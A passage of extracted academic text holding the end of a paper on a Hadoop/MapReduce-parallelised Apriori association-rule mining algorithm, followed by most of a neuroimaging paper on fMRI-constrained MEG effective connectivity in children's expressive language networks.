2-item set L2. 4) The algorithm uses L2 JOIN L2 to form a set C3 of candidate 3-item sets. 5) Using the items in C3 to traverse the database again, the support degree of each candidate set can be obtained. All items with support levels not lower than the support level generate frequent 3-item set L3. The above process is performed iteratively until the candidate set C k is empty. The Apriori algorithm does multiple IO operations on the database. Each stage consists of two parts, namely connection and pruning. Figure 1. Apriori flow B. Apriori algorithm instance analysis Original transaction T10={A,C,D}, T20={B,C,E}, T30={A,B,C,E}, T40={B,E}. Suppose min_sup=2. Then L1={{A},{B},{C},{E}}, L2={{A,C},{B,C},{B,E},{C, E}}. 1) Self join, C3=L2×L2={{A,C},{B,C},{B,E}, {C,E}} × {{A,C},{B,C},{B,E},{C,E}}={{A,B,C},{A,C,E},{B,C,E}} 2) Pruning, Any frequent item set, its subset must also be frequent. For Candidate Set C3, clearing those subsets with infrequent options: The two items subset of {A,B,C} are {A,B},{A,C},{B,C}, where {A,B} is not an element of L2, so remove this option.; The two items subset of {A,C,E} are {A,C},{A,E},{C,E}, where {A,E} is not an element of L2, so remove this option; All the two items subset generated by {B,C,E} are {B,C},{B,E},{C,E}, the subsets produced by {B,C,E} all satisfy the requirements of L2. Therefore, this option is not deleted. 3) In this way, C3={{B,C,E}} obtained after pruning. Figure 2. Apriori algorithm execution process C. The shortcomings of Apriori algorithm 1) When the Apriori algorithm generates the candidate item set, it needs to perform the self-connection operation on the frequent itemsets obtained in the previous step. Then scan the transaction data set again and compare the candidate set formed by the self-connection with min_sup. During the self-connection operation, a large amount of comparison work will be performed. 2) Apriori algorithm need to rescan transaction datasets before pruning, and then compare with min_sup. Therefore, when the size of the transaction dataset is getting larger and larger, each scan will consume a lot of time, resulting in inefficient mining. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 102 3) In the current situation where the data information has a high dimension and the type is complex, the classical Apriori algorithm can't satisfy users. 4) Because the classic Apriori algorithm is only applicable to a single machine, when the size of transaction data sets gradually becomes larger and larger, it will lead to inefficient mining, insufficient storage space, and even system crashes. III. PARALLEL MEC-APRIORI ALGORITHM BASED ON MAPREDUCE APRIORI ALGORITHM A. Reduce frequent item sets self-connection comparison times and pruning steps In the processing of candidate sets, a method of transaction compression characteristics has been introduced. That is, according to the n-dimensional data item set, if itself is not a frequent item set, then the n-1 dimensional subset of the n-dimensional data item set is also not a frequent item set. Therefore, in the mining of candidate sets in the transaction database, the number of candidate candidate sets is compared and deleted because of the method of transaction compression characteristics, so that the number of candidate sets is gradually reduced, and the time efficiency of mining frequent itemsets is improved. B. Reduce the Number of Scanned Databases When mining frequent itemsets, the original transaction database is converted into a vertical data table, and then scan the vertical data table to mine frequent itemsets, because only one transaction database was scanned, a problem with frequent I/O was solved to some extent. C. Combining Apriori Algorithm and Hadoop Platform With the ever-increasing size of data, the traditional Apriori algorithm has been difficult to support its massive database of transactions. The solution to this problem is to add the Hadoop distributed platform to the Apriori algorithm[10], which not only makes the traditional Apriori algorithm run more efficiently, but also eases the storage pressure of the transaction database. 1) Generate frequent itemsets The flow chart in this stage is shown in Figure.2 Figure 3. Generate frequent itemsets flow a) The way of data blocks formatting For the function of interface named Input Format implements Record Reader(Interface) is to convert data blocks into key-value pairs, eg: <key1,value1>. b) Perform Map task The idea of the first step is to generate the frequent item sets of each block. c) Perform Reduce tasks The key-value data output by the Combiner function is used as the input data of the Reduce phase. After a series of merging processes, some frequent item sets of the data module are obtained as a global candidate item set. d) Scan transaction data set D Call the Map function to rescan the formed global candidate frequent item set, and self- join , compare the minimum support count with the set of transaction items formed by the self-join, If it is less than the minimum support, then the last local frequent itemset is the final global frequent itemset, then pass it to the Reduce function and summarize it. Instead, it is necessary to iterate the local frequent itemsets until a frequent itemset is generated. 2) Generation of association rules After association rules mine frequent item sets, it is necessary to generate strong rules. The emergence of strong rules is shown in Figure.3: International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 103 Figure 4. Generate strong rules flow a) In the transaction dataset that holds the text, the input data of the Map must exist in the form of a key-value pair, so each row of data can be treated as a transaction. The key in a key-value pair is the offset of each row of data, and the value is represented as this row of data. b) These key-value pairs are used as the input of the Map function, and then a set of frequent items conforming to the actual situation is obtained according to the set support threshold. c) The output of Combiner function in Map stage is used as the input data of Reduce stage, then it is processed according to the local frequent itemsets generated in Map stage, and finally the strong association rules of the output are stored in HDFS. IV. EXPERIMENTAL ASSESSMENT AND ANALYSIS A. Setting Up a Hadoop Cluster Environment The size of a Hadoop cluster is arbitrary. A small cluster can consist of a NameNode and several DataNodes. And a large cluster can consist of a NameNode and hundreds of DataNodes. Local mode, pseudo-distribution mode and fully-distributed mode are three modes built by Hadoop clusters. Considering the hardware configuration problem, This paper choses to use a virtual machine to set up a cluster environment, and the number of nodes in the cluster is 3, as shown in Figure.4 Figure 5. Build a cluster environment B. Data Comparison Experiment 1) UCI experimental data This experiment selects the retail file in the UCI database (association rules to study the classic data set) as the experimental transaction data set. By comparing the MEC-Apriori algorithm with the traditional Apriori algorithm, the results show that the time performance of the MEC-Apriori algorithm has been greatly improved in the mining of frequent itemsets and candidate itemsets, thus verifying the efficiency and feasibility of the improved algorithm. 2) Implementing the MEC-Apriori Algorithm Model First, the experimental data set in the file retail is selected, and the data set in the retail is mined using the new MEC-Apriori algorithm, and then the association rule is obtained according to the user-defined support degree and the confidence threshold. Figure 6. Simulation flow International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 104 3) Experiment content and result analysis Experiment 1: Performance Comparison between Single Apriori Algorithm and MEC-Apriori Algorithm The transaction data set for this experiment is stored as a file, Performance analysis of mining time before and after improved with 3 nodes Hadoop cluster test algorithm. First, on the premise that the number of nodes in the Hadoop cluster is unchanged, continuously increase the number of item sets in the experimental data item set, and set the minimum support to the same, that is, min_sup=0.3. The experimental results are shown in Table 1.1. TABLE.I. COMPARING APRIORI WITH MEC-APRIORI MINING TIME Transaction itemsets Apriori Mining time/s MEC-Apriori Mining time /s 2050 18.8 12.6 4150 25.4 14.8 6300 35.6 22.8 8150 59.2 35.7 11040 72.6 40.5 According to the experiment, the result obtained, convert the result to a line chart to make it more intuitive, Figure 4 shows the time Performance between MEC-Apriori and Apriori. Horizontal axis: number of transaction item sets. Vertical axis: time/s. Figure 7. Improved and improved time performance charts From the figure 4, the MEC-Apriori algorithm and the classical Apriori algorithm are on the premise of the same number of transaction itemsets, it is often better than Apriori algorithm in temporal performance, and with the increasing number of transaction item sets, apriori algorithm running on a computer can significantly improve the time of mining analysis. However, with the MEC-Apriori algorithm, as the number of transaction item sets increases, the time performance is getting better and better. Because with the increase in the number of transaction items, the nodes of the distributed cluster will gradually increase. In summary, the improved MEC-Apriori algorithm is superior to the classic Apriori algorithm in temporal performance. Experiment 2: Performance Comparison between Apriori Algorithm and MEC-Apriori Algorithm under Different Supporting Degrees. First ,this paper test the data set RETAIL, select the minimum support threshold range [0.02, 0.20]. And within this range, evenly increase the step: 0.02, so there will be a threshold of 10. Then, this paper use the data set retail to run the Apriori algorithm and the MEC-Apriori algorithm respectively, and record the running time (Note that the running time is second). Figure 5 shows the experimental data obtained by executing the above three algorithms. Horizontal axis: support; vertical axis: time/s. Experiments show that the MEC-Apriori algorithm runs much less time than the Apriori algorithm under different support levels. The higher the support, the Apriori algorithm will run a little longer than the MEC-Apriori algorithm. In summary, the temporal performance of the MEC-Apriori algorithm under different support levels is always superior to the traditional Apriori algorithm. Figure 8. Performance comparison under different support levels International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 105 V. CONCLUSION Aiming at the traditional Apriori algorithm, when mining frequent itemsets, you need to continuously scan transaction data sets , So that the system I / O overhead and other shortcomings. In this paper, we improved Apriori algorithm in three aspects: compression in the transaction, reducing the number of scanning areas, and simplifying the candidate set generation. At the same time, the improved algorithm is parallelized in the Hadoop framework. The simulation results show that compared with the traditional Apriori algorithm, the MEC-Apriori algorithm has good performance and security in temporal performance, mining frequent candidate itemsets and different support levels. However, it needs to be continuously improved in the future work. REFERENCES [1] K.WANG, Y.HE, J.HAN. Mining Frequent Itemsets Using Support Constraints. Proc2000 Int. Conf. Very Large Data Bases[J]. Cairo, Egypt, 2000.9: 43-52. [2] Yan Xiaofei. Research on Association Rule Mining Algorithm[D]. Chongqing: Chongqing University, 2009:15-21. [3] AGRAWAL R.SRIKANT R.Fast algorithm for mining a ssociation rules[C]//Proceedings of 20th Int. Conf. Very Large Data Bases(VLDB). Morgan Kaufman Press,1994:487-499. [4] REN W J , YU B W. Improved Apriori Algorithm Based on Matrix Reducation[J]. Computer and Modern,2015,10. 2-3. (in Chinese) [5] GUNARATHNE T , WU TL, QIU J ,et al .MapReduce in the Clouds for Science[C]//2010 IEEE Second International Conference on Cloud Computing Technology and Science (Cloudcom). IEEE,2010;565-572 [6] DEAN J,GHEMAWAT S. MapReduce: simplified data processing on large clusters[J]. Communications of the ACM, 2008, 51(1):107-113. [7] HE B S, TAO M, YUAN X M. Alternating direction me-thod with Gaussian back substitution for Separable convex programming [J]. SIAM J. Optimization, 2012, 22(2): 313-340. [8] HE B S,LIAO L Z,YUAN X M. Alternating projection based prediction-correction methods for structured variational inequalities[J]. Computational Mathematics, 2006, 24(6):693-710. [9] CHEN Z M, WAN L, YANG Q Z. An Inexact Direction Methodfor Structured Variational Inequalities[J]. Journal of Optimization Theory & Applications, 2014, 163(2): 439-459. [10] Lu Jiaheng. Hadoop Combat [M]. Beijing: Mechanical Industry Press, 2011: 17-128. work_k5irpuwxmrejppzgofqpx24ehe ---- BRAIN-2015-0374-ver9-Kadis_5P 76..83 Characterizing Information Flux Within the Distributed Pediatric Expressive Language Network: A Core Region Mapped Through fMRI-Constrained MEG Effective Connectivity Analyses Darren S. Kadis, 1–3 Andrew Dimitrijevic, 4–6 Claudio A. Toro-Serey, 1 Mary Lou Smith, 7,8 and Scott K. Holland 1,3,4,9 Abstract Using noninvasive neuroimaging, researchers have shown that young children have bilateral and diffuse language networks, which become increasingly left lateralized and focal with development. Connectivity within the distributed pediatric language network has been minimally studied, and conventional neuroimaging approaches do not distinguish task-related signal changes from those that are task essential. In this study, we propose a novel multimodal method to map core language sites from patterns of information flux. We retrospectively analyze neuroimaging data collected in two groups of children, ages 5–18 years, performing verb generation in functional magnetic resonance imaging (fMRI) (n = 343) and magnetoencephalography (MEG) (n = 21). The fMRI data were conventionally analyzed and the group activation map parcellated to define node locations. Neuronal activity at each node was estimated from MEG data using a linearly constrained minimum variance beamformer, and effective connectivity within canonical frequency bands was computed using the phase slope index metric. We observed significant ( p £ 0.05) effective connections in all subjects. The number of suprathreshold connections was significantly and linearly correlated with participant’s age (r = 0.50, n = 21, p £ 0.05), suggesting that core language sites emerge as part of the normal developmental trajec- tory. Across frequencies, we observed significant effective connectivity among proximal left frontal nodes. Within the low frequency bands, information flux was rostrally directed within a focal, left frontal region, approximating Broca’s area. At higher frequencies, we observed increased connectivity involving bilateral perisylvian nodes. Frequency- specific differences in patterns of information flux were resolved through fast (i.e., MEG) neuroimaging. Key words: Broca’s area; causal network; children; functional magnetic resonance imaging; linearly constrained minimum variance beamformer; magnetoencephalography; multimodal; parcellation; phase slope index Introduction Normal developmental changes in gross languagerepresentation have been well characterized using noninvasive neuroimaging. With functional magnetic res- onance imaging (fMRI), and more recently, magnetoen- cephalography ( MEG), researchers have shown that healthy young children have bilateral and diffuse lan- guage networks, which become increasingly left later- alized and focal with development (Brown et al., 2005; Holland et al., 2001; Kadis et al., 2011; Ressel et al., 2008). 1 Pediatric Neuroimaging Research Consortium, Cincinnati Children’s Hospital Medical Center, Cincinnati, Ohio. 2 Division of Neurology, Cincinnati Children’s Hospital Medical Center, Cincinnati, Ohio. 3 Department of Pediatrics, College of Medicine, University of Cincinnati, Cincinnati, Ohio. 4 Communication Sciences Research Center, Cincinnati Children’s Hospital Medical Center, Cincinnati, Ohio. 5 Division of Pediatric Otolaryngology, Cincinnati Children’s Hospital Medical Center, Cincinnati, Ohio. 6 Department of Surgery, College of Medicine, University of Cincinnati, Cincinnati, Ohio. 7 Department of Psychology, University of Toronto, Toronto, Ontario, Canada. 8 Department of Psychology, Hospital for Sick Children, Toronto, Ontario, Canada. 9 Division of Radiology, Cincinnati Children’s Hospital Medical Center, Cincinnati, Ohio. ª Darren S. Kadis, et al., 2016; Published by Mary Ann Liebert, Inc. This Open Access article is distributed under the terms of the Creative Commons Attribution Noncommercial License (http://creativecommons.org/licenses/by-nc/4.0/) which permits any noncommercial use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited. BRAIN CONNECTIVITY Volume 6, Number 1, 2016 Mary Ann Liebert, Inc. DOI: 10.1089/brain.2015.0374 76 An early distributed network is thought to confer a pediat- ric advantage in the event of cerebral insult. Adults with left perisylvian injury tend to develop severe and lasting apha- sias, whereas young children with comparable insults experi- ence minimal language disturbance and develop essentially normal language through childhood and adolescence (Bal- lantyne et al., 2008; Bates et al., 2001; Reilly et al., 1998; Vargha-Khadem et al., 1985; see also, Jacola et al., 2006; Tillema et al., 2008). Sparing of language is realized through functional engagement of the extracanonical cortex. The po- tential for both interhemispheric and intrahemispheric plas- ticity (i.e., establishment of an atypical language network) decreases with age, and relatively poor outcomes and failure to form atypical networks are seen with insults occurring after about age 5 or 6 years (Branch et al., 1964; Brazdil et al., 2003; Helmstaedter et al., 1997; Kadis et al., 2007, 2009; Rasmussen and Milner, 1977; Saltzman-Benaiah et al., 2003; Satz et al., 1988). Normal developmental changes in language representation provide a compelling context in which the potential for ef- fective plasticity would be expected to decrease with age. However, the timing for establishment of adult-typical repre- sentation does not perfectly track with the clinical outcome data. In fMRI, mature left lateralization and focalization of the BOLD activity is protracted in the developmental period, with adult-typical representation emerging in adolescence or young adulthood (e.g., Szaflarski et al., 2006). Similarly, in MEG language studies, dipoles fit to average waveforms and signature oscillatory activity tend to left lateralize and focalize in the teen years (Gummadavelli et al., 2013; Kadis et al., 2008, 2011; Ressel et al., 2008). The discord suggests that conven- tional neuroimaging approaches to language mapping fail to distinguish task-correlated hemodynamic or neuronal activity from that which is task essential (i.e., necessary and sufficient for task completion). The result is relatively broad ‘‘activa- tion’’ maps for childhood function, which fail to delineate the core regions necessary for task completion. Recent developments in neuroimaging technology, and particularly the high temporal resolution afforded by MEG, permit assessment of neuronal population dynamics, includ- ing characterization of transient activity and estimation of causal networks. In this study, we seek to estimate informa- tion flux (directional or effective connectivity) within the distributed pediatric expressive language network. We report on findings from two groups of children completing verb generation tasks in fMRI and MEG. Large-scale fMRI data are used to provide a spatial template of task-related activa- tion. The group activation map is then segmented using a 200-unit random parcellation scheme (Craddock et al., 2012), with parcel centroids used to define network node lo- cations. The neuromagnetic activity at each node is estimated from MEG recordings using a beamformer, and the time courses are subjected to effective connectivity analyses using the phase slope index (PSI) metric recently introduced by Nolte and associates (2008). Unlike many other electro- physiological metrics of effective connectivity, PSI remains insensitive to mixing/volume conduction, providing robust estimates of information flux between both proximal and dis- tal node pairs. The pipeline capitalizes on the relative strengths of fMRI and MEG (spatial and temporal resolution, respectively) and is sensitive to the regional dynamics that is known to underlie all higher cognitive processes. Method We analyze fMRI and MEG data that were collected for two separate studies investigating developmental changes in language representation. The participants, tasks, and data acquisition have been documented previously (Holland et al., 2007; Kadis et al., 2011; see also, Kadis et al., 2008; Karunanayaka et al., 2010, 2011; Pang et al., 2011) and are described only briefly below. The focus of the current study is on integration of data from the two imaging modal- ities and the novel application of effective connectivity ana- lyses for mapping a core functional network. Data acquisition Functional magnetic resonance imaging Participants. The fMRI cohort included 343 typically de- veloping children (170 males), ages 5–18 years (M = 12.0, SD = 3.8), studied at Cincinnati Children’s Hospital Medical Center (Cincinnati, OH) between 2000 and 2006. This a slightly larger cohort than initially described in Holland and associates (2007), as recruitment continued beyond initial analysis and publication. All participants in the study were na- tive English speakers, free from language disability, learning disability, and neurological disorder. Edinburgh Handedness Inventory (EHI; Oldfield, 1971) scores indicate that 318 were right handed, 22 left handed, and 3 ambidextrous. Parents provided consent, and children aged 8 years and older assented to participate. The study was approved by the Hospital’s Institutional Review Board. fMRI verb generation. Children alternately listened to re- cordings of concrete nouns generated by an adult female speaker (task block) or speech-frequency warble tones (control block). During the task block, children covertly generated ac- tion words corresponding to each noun. The noun stimuli were presented at a rate of once every 5 sec, in five 30-sec blocks. During the control block, children were asked to simply listen to each tone. Warble tones were presented every 5 sec, in six 30-sec blocks. Participants listened to a total of 30 nouns and 36 warble tones during the 5.5 min fMRI recordings. Functional and structural MRI scanning was performed on a Bruker BioSpec 30/60 3T system (Bruker Medizintechnik, Karlsruhe, Germany). The fMRI scans were acquired using a T2*-weighted gradient echo EPI sequence (TE = 38 msec, TR = 3000 msec, FOV = 256 · 256 mm, slice thickness = 5 mm). At each of the 110 time points, 24 slices were acquired. The initial 10 time points (corresponding to a control block) were discarded to allow protons to reach T1 relaxation equilib- rium. A T1-weighted whole brain structural image was acquired using a 3D MDEFT scan (TE = 4.3 msec, TR = 15.7 msec, voxel size = 1.0 · 1.0 · 1.5 mm). Magnetoencephalography Participants. The MEG cohort included 21 typically de- veloping children (13 males), ages 5–18 years (M = 12.2, SD = 4.6), scanned at the Hospital for Sick Children (Tor- onto, ON) between 2007 and 2008. This a subset of partici- pants described in Kadis and associates (2011); only subjects with structural MRIs of sufficient quality for automated seg- mentation and single-shell head modeling in SPM were in- cluded in this study (see forward modeling description MAPPING EFFECTIVE CONNECTIVITY WITH FMRI-CONSTRAINED MEG 77 under ‘‘Extraction of nodal time courses from MEG data’’ section, below). Participants were native English speakers, negative for history of neurological disorder, learning disabil- ity, and language disturbance. Children showed a typical distribution of hand preference, with 19 right handed and 2 ambidextrous, based on EHI scores. Parents provided consent, and children and adolescents assented to participate. The study was approved by the Hospital’s Research Ethics Board. MEG verb generation. Participants alternately viewed color pictures of everyday objects (task condition) or scrambled color images with a superimposed central fixation cross (con- trol condition). Task stimuli were presented for 500 msec, and control stimuli were presented for 1500–2500 msec (jit- tered). The order of presentation was random within each con- dition. For the task condition, children were required to covertly generate a verb for each object viewed, as quickly as possible. For the control condition, children were asked to look at the central fixation cross. Overt assessment following MEG acquisition showed that all participants were able to per- form the task, and children aged 5–10 had a mean accuracy of 85% across trials. MEG scanning was performed on a 151-channel whole- head CTF system ( MEG International Services Ltd., Coqui- tlam, BC, Canada). Subjects were tested in the supine position, with the projection screen positioned above the lower face and neck region, for comfortable viewing. Stimuli were presented within 2–3� of the center of the visual field to promote foveal projection. Head localization coils were placed at nasion and preauricular points to monitor move- ment. Data were acquired at 625 Hz, with an online 100- Hz low-pass filter. In all cases, head displacement was less than 5 mm from the beginning to end of acquisition. To facil- itate MEG-MRI coregistration (required for accurate forward modeling in source analyses), multimodal radiographic markers were placed at the nasion and preauricular positions before acquiring structural images. MRI was conducted on a GE Signa Advantage 1.5T scanner (GE Medical, Milwaukee, WI). A whole brain T1-weighted image was acquired using a 3D-SPGR scan (TE = 4.2 msec, TR = 9 msec, voxel size = 0.94 · 0.94 · 1.50 mm). Analyses fMRI analyses. Image preprocessing and first-level ana- lyses were carried out using the Cincinnati Children’s Hos- pital Image Processing Software (CCHIPS; Schmithorst and Dardzinski, 2000). EPI data were corrected for geomet- ric distortion due to B0 field inhomogeneity (Schmithorst et al., 2001) and coregistered to minimize motion effects (Thevenaz et al., 1998). An experienced rater identified land- marks on each subject’s structural image, which were used to linearly transform structural and functional data to a standard space (Talairach and Tournoux, 1988). Functional data were cross correlated with a reference waveform reflecting the time course of task and control blocks, and a t-statistic (verbs minus tones) was computed on a voxel-wise basis. Second-level analyses were carried out in SPM8 (www .fil.ion.ucl.ac.uk/spm/) running in MATLAB R2014a (The MathWorks, Inc., Natick, MA). Individual contrast images were submitted to group analyses in a single sample t test. We identified brain regions showing significantly increased acti- vation for verb generation, using a family-wise error correc- tion of p < 0.01 and clustering threshold of k = 8 voxels. Parcellation of the activation map. As an initial step to in- terrogating the distributed expressive language network for patterns of effective connectivity, we parcellated the group map and established a set of cortical node locations. The group activation map was normalized to the MNI 152 subject average T1-weighted image template and binarized such that only suprathreshold voxels were retained. We cropped the resulting activation map using a gray matter mask (to isolate cortex; mask supplied with SPM8), resampled the image to 4.0 mm isotropic, and multiplied the activation by a random, 200-unit parcellation scheme (provided as a 4.0 mm isotropic image) recently introduced by Craddock and associates (2012). Centroids of cortical parcels with >10 active voxels serve as network nodes. The 200-unit parcellation scheme provides a good trade-off between anatomical interpretabil- ity and functional homogeneity (Craddock et al., 2012), and the node density approximates the specificity of our sub- sequent beamformer analyses (i.e., limited by the under de- terminacy of the inverse; source analyses described below). Extraction of nodal time courses from MEG data. Pre- processing was carried out using FieldTrip (Oostenveld et al., 2011) in MATLAB R2014a. Each participant’s MEG recording was imported and epoched from �450 to 950 msec, relative to the onset of target picture presentation. Trials were baseline corrected (using the �450 to 0 msec window as a baseline), and power line noise was attenuated using a 60-Hz discrete Fourier transform filter. Scanner jump artifacts were automatically identified and trials containing artifacts rejected from each dataset. Forward modeling was conducted in SPM8. Each sub- ject’s T1-weighted MRI was imported, segmented, and then warped to the MNI 152 template to establish a normal- ization deformation field. The source model was constructed from a standard 8196-vertex cortical mesh that was warped to the individual subject’s cortex using the inverse of the deformation. Fiducial locations were manually identified on each subject’s structural MRI, facilitating coregistration with MEG data. Finally, realistic single-shell head models were constructed from the segmented images and lead fields computed using default conductivity parameters. The neuronal activity at each network node was com- puted using FieldTrip’s linearly constrained minimum vari- ance beamformer (with 0.1% regularization, for spheres of 5 mm radius), implemented in SPM8. Trial data were then cropped to 350–750 msec from picture onset, to isolate neu- romagnetic changes reflecting the generative period of the expressive language task (Kadis et al., 2011) in subsequent connectivity analyses. Effective connectivity analyses. We estimated effective connectivity between each pair of network nodes using the PSI metric, recently introduced by Nolte and associates (2008; see also, Nolte and Müller, 2010; Haufe et al., 2013). PSI is computed from the complex coherency func- tion for a pair of signals, and directionality is determined from phase differences in signals over a specified frequency range. When signal i drives (is driven by) signal j, the mean phase differences between i and j will increase (decrease) 78 KADIS ET AL. with frequency and PSI will be positive (negative). For con- venience, PSI is often reported as a normalized value, obtained through division by an estimate of standard devia- tion (here, jackknife resampling was used). The normalized value, PSInorm, can then be interpreted as any z-value would, facilitating statistical thresholding and group-wise quantitation. In the current study, we computed PSInorm for each node pair within canonical bands (delta, *2–4 Hz, low frequency limited by time window; theta, 4–8 Hz; alpha, 8–12 Hz; beta, 13–30 Hz; and gamma, 31–70 Hz) for each subject. To iden- tify significant connections, data are thresholded at PSInorm ‡ 1.96. The value of –1.96 corresponds to the critical value in a two-tailed normal deviate (z) test conducted at alpha = 0.05; because the PSI metrics for any given node pair are an addi- tive inverse (i.e., the PSI for signal i driving j is the nega- tive of PSI for j driving i), only one direction of flux need be considered. Results Network definition Group analyses of the fMRI data revealed consistent acti- vation across individuals in bilateral frontal (including in- sular cortex) and posterior temporal regions, and the left anterior cingulate and right occipital cortices. As expected, the activation encompasses canonical language regions of the left hemisphere (i.e., Broca’s and Wernicke’s areas) and, to a lesser extent, their right hemisphere homologues. Occipital activation has been previously noted in this task and likely relates to visualization associated with the stimu- lus and response (i.e., visualization of the everyday object and/or associated activities). Group activation is shown in Figure 1. The parcellation procedure yielded 27 cortical network nodes. Of these, 20 were located in the left hemisphere, with the largest cluster focused around the inferior, middle, and superior frontal cortices. The application of a 200-unit random parcellation scheme and the resulting set of network nodes are depicted in Figure 2. Node coordinates and their anatomical labels are presented in Supplementary Table S1 (Supplementary Data are available online at www.liebertpub .com/brain). Density of effective connections Subjects had between 7 and 44 (M = 25.9, SD = 9.7) supra- threshold effective connections among network nodes, summed across all frequency bands. The number of surviv- ing connections did not differ among frequency bands ( p > 0.05). Age-related changes in density of effective connec- tions. The total number of suprathreshold connections was positively and linearly correlated with subject age (r = 0.50, n = 21, p £ 0.05), suggesting that older children and adoles- cents meaningfully engage a greater portion of the distrib- uted network during verb generation than younger children do (Figure 3). Within any particular frequency band, the number of surviving effective connections failed to correlate with age ( p > 0.05, uncorrected; Supplementary Fig. S1). Patterns of effective connectivity across frequency spectra To characterize frequency-related differences in patterns of information flux during verb generation in children, we plotted suprathreshold effective connections for each fre- quency bin across all subjects on a template brain (Fig. 4). We observed distinct patterns of information flux across the spectra. In general, low-frequency information flux was focused within the left frontal region; at higher frequencies, effective connectivity was increasingly observed between distal nodes. Within the delta band, information flux was predominantly rostrally directed and focused among proximal nodes of the left inferior and middle frontal gyri. In the theta band, the spa- tial distribution of suprathreshold connections was somewhat broader. We observed a high density of effective connections be- tween putative Wernicke’s and Broca’s areas in the theta, beta, and gamma bands, which were predominantly rostrally directed. In the alpha, beta, and gamma bands, we observed signif- icant interhemispheric effective connectivity. In alpha and beta, bidirectional information transfer was observed be- tween left and right frontal nodes and between left and right posterior temporal nodes. In gamma, the right posterior temporal region emerged as an important driver of both left FIG. 1. Group fMRI acti- vation for verb generation. Colored areas depict signifi- cant fMRI activation in 343 children performing verb generation in fMRI, projected on a template brain ( p < 0.01, FWE corrected; minimum clustering threshold of k = 8 voxels of 1.0 · 1.0 · 1.5 mm dimension). fMRI, functional magnetic resonance imaging. MAPPING EFFECTIVE CONNECTIVITY WITH FMRI-CONSTRAINED MEG 79 posterior temporal (Wernicke’s) and left frontal (Broca’s) re- gions, although this region appears to be driven by the left posterior region at lower frequencies. Across frequency bins, we observed significant informa- tion flux between Wernicke’s and Broca’s areas. However, only minimal effective connectivity was observed between right posterior temporal and right frontal regions, indicating that the right hemisphere language homologues do not sim- ply mirror the function/connectivity of the canonical lan- guage regions in typically developing children. Discussion In this study, we integrated fMRI and MEG data to characterize information flux within the distributed pediatric expressive language network. The approach extends the con- ventional analysis of task-related changes in BOLD signal or oscillatory power in fMRI and MEG; in this study, we map function through patterns of significant effective connectiv- ity, estimated from fast recordings of neuronal population activity. The framework can be easily generalized to charac- terize cortical transmission of information for other cogni- tive domains. The parcellation and MEG analysis approach could also be used to interrogate any arbitrarily defined brain network for patterns of effective connectivity (e.g., as- sess information flux within a theoretically derived network defined by anatomical boundaries), in the absence of avail- able fMRI data. Using thresholded normalized PSI to identify regions of significant information flux, we clearly resolved a core left frontal subnetwork consisting of 11 nodes in the inferior, middle, and superior frontal gyri and insula, which support verb generation (expressive language) in our pediatric sam- ple. Although some degree of suprathreshold connectivity was observed between all nodal regions, only the left frontal regions showed significant information flux at all frequency bands studied. This preferential localization is consistent FIG. 2. Parcellation and definition of the functional network. (a) Depiction of parcellation scheme in axial slices; each colored patch represents a distinct parcel; the centroids of active parcels are used to define network node locations. (b) The resulting 27 nodes are depicted as colored spheres on a template brain; left hemisphere nodes (n = 20) are shown in blue and right hemisphere nodes (n = 7) are shown in red. FIG. 3. Age-related increase in number of significant ef- fective connections. For each subject, the number of signifi- cant effective connections was summed across all frequency bands. Plot shows the significant age-related increase in the total number of suprathreshold (PSInorm ‡ 1.96) effective connections observed within the distributed network (r = 0.50, n = 21, p £ 0.5). PSI, phase slope index. 80 KADIS ET AL. with the earliest accounts of expressive language disturbance following left inferior frontal injury (e.g., Broca, 1861; see also, Dronkers, 1996) and subsequent clinically informed models of gross language representation championed by Geschwind (1970, 1972). Localization is also consistent with previous neuroimaging studies of expressive language in both children (e.g., Karunanayaka et al., 2010, 2011) and adults (e.g., McCarthy et al., 1993; Szaflarski et al., 2006). In general, the left inferior and middle frontal cortex has been implicated in semantic processing and word retriev- al; the insular cortex is involved in speech or articulatory planning (Price, 2012). Uniquely, we observed changing patterns of effective connectivity among the 27 network nodes, depending on the frequency analyzed. In the delta band, rostrally directed effective connections were focused within the left frontal nodes. Progressing through theta, alpha, and beta bands, we see a transition to predominantly caudally directed con- nections among the same nodes. Findings highlight the var- iable nature of information flow that can occur among a fixed set of nodes, at different frequencies. Similarly, we observed changes in the spatial distribution of information flux across the spectra. In the delta and theta bands, we observe effective connectivity primarily between proximal left inferior frontal nodes; in the alpha and beta bands, we see increasing in- volvement of midline regions, and at beta and gamma, we observe bilateral posterior temporal nodes emerging as im- portant drivers in the network. These spectrally resolved changes in patterns of information flux cannot be resolved in conventional neuroimaging. We expect that increased ac- cess to MEG for studying language will necessitate updates to the current network models, to account for the distinct pat- terns of connectivity that occur at various timescales. Across frequency bands, the total number of suprathres- hold effective connections was found to increase with age in our pediatric sample. The finding initially appears to run counter to the established literature showing relatively bilat- eral and extensive representation in the youngest children (e.g., Szaflarski et al., 2006; Kadis et al., 2011). However, we propose that patterns of significant information flux re- veal the core components of a network—those regions that are engaged in a consistent coordinated manner and are nec- essary for function—reflecting the neural strategy used for task completion. We do not expect developmental changes in effective connectivity to track with developmental changes in task-related BOLD signal or oscillatory power distribution. Collectively, the data suggest that young chil- dren possess a broadly distributed expressive language net- work, as evidenced from conventional neuroimaging, with relatively few core (vulnerable) nodes. Relative plasticity for language representation in young children is possible be- cause the broader network lacks established core nodes. With development, the extent of the overall network decreases, while patterns of information flux become entrained. A left lateralized, focal, core expressive language network emerges as part of the normal developmental trajectory, and plasticity is diminished. In the future, we hope to assess the stability of these connectivity patterns through adulthood. In this study, fMRI data served as a ‘‘hard constraint’’ on subsequent MEG effective connectivity analyses. By ap- plying an activation map that was established through large-scale investigation, we unambiguously focus on brain regions known to undergo task-related hemodynamic changes during verb generation in children. Parcellation of the fMRI activation map serves to reduce the number of comparisons needed to characterize information flux. We FIG. 4. Effective connec- tivity within canonical fre- quency bands. Significant node-to-node effective con- nections are represented as green arrows, which indicate the direction of information flow. The thickness of each arrow reflects the relative frequency of suprathreshold effective connectivity across subjects. MAPPING EFFECTIVE CONNECTIVITY WITH FMRI-CONSTRAINED MEG 81 preferred a multimodal approach over unimodal MEG, since methods used to identify language cortex in fMRI have been relatively well established and the extent of cortex involved is easily interpreted from an activation map. In contrast, the choice of source localization approach in MEG will impact ensuing functional maps and most attempts to solve the in- verse solution produce localizations that are difficult to in- terpret in terms of extent (e.g., 